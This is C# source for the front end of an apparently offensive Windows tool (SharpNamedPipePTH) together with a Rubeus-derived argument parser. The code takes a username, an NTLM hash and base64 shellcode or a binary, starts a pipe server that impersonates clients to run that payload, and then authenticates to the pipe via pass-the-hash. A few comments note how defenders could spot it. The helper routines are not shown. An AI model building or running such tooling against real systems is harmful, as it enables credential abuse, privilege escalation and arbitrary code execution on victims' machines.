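//Argument parsing class from Rubeus (https://github.com/GhostPack/Rubeus/)
//Author: @Harmj0y

/// <summary>
/// Converts raw command-line tokens into a key/value dictionary.
/// </summary>
/// <remarks>
/// A token containing ':' after its first character is split at the FIRST colon:
/// the left part (lower-cased) becomes the key, and everything after that colon
/// (including any further colons) becomes the value. A token without such a colon
/// is matched case-insensitively against the known switches below; anything else
/// is stored under its original spelling with an empty value.
/// Lower-casing uses the invariant culture so that keys and switches containing
/// 'I' (for example "PIPENAME" or "-CHECKADMIN") resolve the same way regardless
/// of the host's regional settings; culture-sensitive ToLower() maps 'I' to a
/// dotless 'ı' under Turkish/Azeri cultures and the later lookups would miss.
/// </remarks>
/// <param name="args">Raw argument tokens, normally the process command line.</param>
/// <returns>
/// <c>ArgumentParserResult.Success</c> wrapping the dictionary, or
/// <c>ArgumentParserResult.Failure()</c> if any exception was raised while parsing
/// (the exception message is written to the console).
/// </returns>
public static ArgumentParserResult Parse(IEnumerable<string> args)
{
    var arguments = new Dictionary<string, string>();
    try
    {
        foreach (var argument in args)
        {
            var idx = argument.IndexOf(':');
            if (idx > 0)
            {
                // key:value form - only the key is case-normalised, the value is kept verbatim.
                arguments[argument.Substring(0, idx).ToLowerInvariant()] = argument.Substring(idx + 1);
                continue;
            }

            switch (argument.ToLowerInvariant())
            {
                case "-debug":
                    arguments["debugging"] = "true";
                    break;
                case "-h":
                case "-help":
                    arguments["showhelp"] = "true";
                    break;
                case "-checkadmin":
                    arguments["admincheck"] = "true";
                    break;
                case "-forcesmb1":
                case "-smb1":
                    arguments["forcesmb1"] = "true";
                    break;
                case "-comspec":
                    arguments["comspec"] = "true";
                    break;
                default:
                    // Unknown bare token: recorded under its original casing with no value.
                    arguments[argument] = string.Empty;
                    break;
            }
        }

        return ArgumentParserResult.Success(arguments);
    }
    catch (System.Exception ex)
    {
        // Broad catch kept on purpose: a null token or null sequence is reported as a
        // parse failure to the caller instead of terminating the process.
        Console.WriteLine(ex.Message);
        return ArgumentParserResult.Failure();
    }
}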
/// <summary>
/// Program entry point. Reads key:value options from the command line, starts a
/// named-pipe server on a background thread, then connects to that pipe using the
/// supplied username, domain and credential hash.
/// </summary>
/// <remarks>
/// Required options: <c>username</c>, <c>hash</c>, and at least one of
/// <c>shellcode</c> (base64) or <c>binary</c>. Optional: <c>domain</c> (default "."),
/// <c>pipename</c> (default "ShitSecure") and the <c>forcesmb1</c> switch.
/// Review notes for defenders: the credential hash and the base64 payload are passed
/// as plain command-line arguments, so they are visible wherever process command-line
/// auditing is enabled. The pipe name is caller-controlled, so a detection keyed only
/// on the default name is brittle.
/// </remarks>
/// <param name="args">Command-line tokens in <c>key:value</c> or <c>-switch</c> form.</param>
public static void Main(string[] args)
{
    // Caller-supplied settings with their defaults.
    string username = "";
    string domain = ".";
    string pipename = "ShitSecure";
    string hash = "";
    bool ForceSMB1 = false;
    string binary = "";
    string shellcode = "";

    // Track which of the mandatory options were actually provided.
    bool hasUsername = false;
    bool hasHash = false;
    bool hasShellcode = false;
    bool hasBinary = false;

    try
    {
        if (args.Length < 1)
        {
            displayHelp("Usage:");
            return;
        }

        ArgumentParserResult parsed = ArgParse.Parse(args);
        if (!parsed.ParsedOk)
        {
            displayHelp("Error Parsing Arguments");
            return;
        }

        var options = parsed.Arguments;
        if (options.ContainsKey("showhelp") || options.ContainsKey("-h"))
        {
            displayHelp("Usage:");
            return;
        }

        // Scratch slot for TryGetValue so a missing key never overwrites a default.
        string supplied;

        if (options.TryGetValue("pipename", out supplied))
        {
            pipename = supplied;
        }

        if (options.TryGetValue("shellcode", out supplied))
        {
            shellcode = supplied;
            hasShellcode = true;
        }

        if (options.TryGetValue("binary", out supplied))
        {
            binary = supplied;
            hasBinary = true;
        }

        if (options.ContainsKey("forcesmb1"))
        {
            ForceSMB1 = true;
        }

        if (options.TryGetValue("hash", out supplied))
        {
            hash = supplied;
            hasHash = true;
        }

        if (options.TryGetValue("username", out supplied))
        {
            username = supplied;
            hasUsername = true;
        }

        if (options.TryGetValue("domain", out supplied))
        {
            domain = supplied;
        }

        // Username and hash are mandatory, plus at least one payload source.
        if (!hasUsername || !hasHash || (!hasShellcode && !hasBinary))
        {
            // Prints the four presence flags (True/False) before the usage text.
            Console.WriteLine(hasUsername);
            Console.WriteLine(hasHash);
            Console.WriteLine(hasShellcode);
            Console.WriteLine(hasBinary);
            displayHelp("Usage:");
            return;
        }
    }
    catch
    {
        displayHelp("Error Parsing Arguments");
        return;
    }

    // Change WINSTA/DESKTOP permissions for the named account (helper is defined
    // elsewhere in the project; its exact effect is not visible from here).
    GrantAccessToWindowStationAndDesktop(username);

    // Start the pipe server on its own thread.
    Console.WriteLine("Starting Pipe Server Thread!");

    // NOTE(review): the base64 decode runs outside the try/catch above, so malformed
    // input surfaces as an unhandled FormatException rather than the usage text.
    byte[] shellcodebytes = hasShellcode ? Convert.FromBase64String(shellcode) : null;
    Thread serverThread = new Thread(
        () => SharpNamedPipePTH.PipeServerImpersonate.ImpersonateClient(pipename, binary, shellcodebytes));
    serverThread.Start();

    // Connect to the named pipe with the supplied credentials.
    Console.WriteLine($"Connecting to the Named Pipe via Pass-the-Hash - using username {username}");

    // Fixed four-second wait; presumably gives the server thread time to create the
    // pipe. There is no explicit synchronisation with that thread.
    Thread.Sleep(4000);
    SharpNamedPipePTH.NamedpipePTH.NamedPipePTH(username, domain, hash, pipename, ForceSMB1);
}